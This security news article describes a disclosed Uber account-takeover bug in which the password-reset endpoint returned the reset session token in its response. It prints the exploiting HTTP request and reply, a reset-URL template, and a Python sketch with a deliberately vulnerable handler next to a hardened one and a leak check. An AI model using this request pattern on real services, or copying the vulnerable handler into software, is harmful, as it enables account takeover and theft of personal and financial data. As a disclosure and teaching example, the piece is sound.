UBER Authentication Vulnerability found


An authentication vulnerability found in Uber allows anyone to change the password of any Uber account without any authentication. Vincenzo C., an Italian security expert known on Twitter as @Procode701, discovered a critical authentication vulnerability in Uber by which anyone can reset the password for any account.

The researcher found the ‘Improper Authentication’ vulnerability through the company's bug bounty program, which is operated by HackerOne.

“With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account”, Uber explained.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The security expert found that the flaw in the password reset flow could be exploited to generate an authentication token, “inAuthSessionID”, which anyone could then use to change the password for any account.

Here is the Uber Improper Authentication flaw:

To change the password for any account, you just need to obtain a session token, “inAuthSessionID”, and then use the standard link that is present in the change password form:

https://auth.uber.com/login/stage/PASTE SESSION ID/af9b9d0c-bb98-41de-876c-4cb911c79bd1

Here “PASTE SESSION ID” is the inAuthSessionID generated through the change password email, and af9b9d0c-bb98-41de-876c-4cb911c79bd1 is the tokenID, which has no expiration date.
Request

POST /login/handleanswer HTTP/1.1
Host: auth.uber.com

{
  "init": false,
  "answer": {
    "type": "PASSWORD_RESET_WITH_EMAIL",
    "userIdentifier": {
      "email": "xxxx@uber.com"
    }
  }
}

Reply

HTTP/1.1 200 OK

{
  "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
  "stage": {
    "question": {
      "signinToken": "",
      "type": "VERIFY_PASSWORD_RESET",
      "tripChallenges": []
    },
    "alternatives": []
  }
}

The impact of the vulnerability is critical. It allows an attacker to access any account and any user’s personal data (ID card, banking data, driver's license), including financial data.
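
A minimal model of the flaw and its fix, added here as an illustration and not Uber's code: the first handler returns the reset secret in the HTTP response as in the exchange above, while the second delivers it only by email, expires it, makes it single-use, and answers identically for unknown addresses. The function names, the 15-minute lifetime, the in-memory stores and the sample account are assumptions.

```python
import hashlib
import json
import secrets
import time

TOKEN_TTL = 15 * 60             # assumed lifetime; the tokenID on the page never expired
USERS = {"rider@example.com"}   # constructed sample account
OUTBOX = []                     # stands in for the mail system (out-of-band channel)
_pending = {}                   # sha256(token) -> (email, expires_at); raw token is not stored


def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()


def _issue(email):
    token = secrets.token_urlsafe(32)
    _pending[_digest(token)] = (email, time.time() + TOKEN_TTL)
    return token


def start_reset_vulnerable(email):
    """Flawed shape: the secret that authorizes the reset is returned to the caller."""
    return {"stage": "VERIFY_PASSWORD_RESET", "inAuthSessionID": _issue(email)}


def start_reset_hardened(email):
    """The token leaves the server only by email; the response never varies."""
    if email in USERS:
        OUTBOX.append((email, _issue(email)))
    return {"stage": "VERIFY_PASSWORD_RESET"}


def redeem(token, now=None):
    """Return the account email for a valid token, else None (single use, expiring)."""
    now = time.time() if now is None else now
    entry = _pending.pop(_digest(token), None)
    if entry is None or now > entry[1]:
        return None
    return entry[0]


def response_leaks(response, secret):
    """Regression check: does a serialized API response contain the reset secret?"""
    return secret in json.dumps(response)
```

The `response_leaks` check is the kind of assertion worth keeping in an API test suite, so that a reset secret reappearing in any response body fails the build.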

